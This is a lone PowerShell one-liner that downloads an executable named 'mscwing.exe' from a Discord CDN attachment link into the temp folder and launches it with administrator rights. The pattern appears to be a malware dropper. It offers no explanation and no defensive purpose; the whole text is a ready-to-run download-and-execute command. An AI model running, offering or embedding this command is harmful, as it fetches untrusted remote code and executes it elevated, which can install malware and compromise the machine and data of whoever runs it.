$destination = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "mscwing.exe"); Invoke-WebRequest -Uri "https://cdn.discordapp.com/attachments/1183150984311099403/1230655444067029052/mscwing.exe?ex=66341c32&is=6621a732&hm=003d71ea968bf5204f8383c69e98380cd5563037789ec4c1bc83f1224a5a097f&" -OutFile $destination; if (Test-Path $destination) { Start-Process -FilePath $destination -Verb RunAs } else { Write-Host "error" }